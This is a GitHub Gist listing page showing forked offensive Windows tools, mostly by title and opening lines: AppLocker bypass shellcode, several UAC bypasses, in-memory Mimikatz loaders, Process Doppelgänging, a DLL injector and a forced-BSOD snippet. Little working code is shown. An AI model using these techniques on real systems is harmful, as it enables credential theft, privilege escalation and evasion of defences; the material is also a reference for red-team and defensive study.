Skip to content

Instantly share code, notes, and snippets.

@decay88
decay88 / Shellcode.cs
Created August 21, 2018 20:05 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@decay88
decay88 / EventVwrBypass.cs
Created August 21, 2018 20:06 — forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
@decay88
decay88 / PELoader.cs
Created August 21, 2018 20:07 — forked from Ridter/PELoader.cs
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@decay88
decay88 / netkatz.cs
Created August 21, 2018 20:08 — forked from Ridter/netkatz.cs
Downloads and Executes Mimikatz In Memory From GitHub
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@decay88
decay88 / katz.cs
Created August 21, 2018 20:09 — forked from Ridter/katz.cs
.NET 2.0.50727 Mimikatz Extract and Execute -
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@decay88
decay88 / inject.c
Created August 28, 2018 03:22 — forked from hfiref0x/inject.c
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
@decay88
decay88 / akagi_42b.c
Created August 28, 2018 03:25 — forked from hfiref0x/akagi_42b.c
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@decay88
decay88 / syringe.c
Created August 28, 2018 12:47 — forked from govolution/syringe.c
Syringe
/*
*
* syringe.c v1.2
*
* Author: Spencer McIntyre (Steiner) <smcintyre [at] securestate [dot] com>
*
* A General Purpose DLL & Code Injection Utility
*
* Copyright 2011 SecureState
*
// BSOD Via RtelSetProcessIsCritical by Souhardya Sardar @subversionzero
// https://www.opensc.io/showthread.php?t=12868&page=2
using System;
using System.Runtime.InteropServices;
namespace Die
{
class Program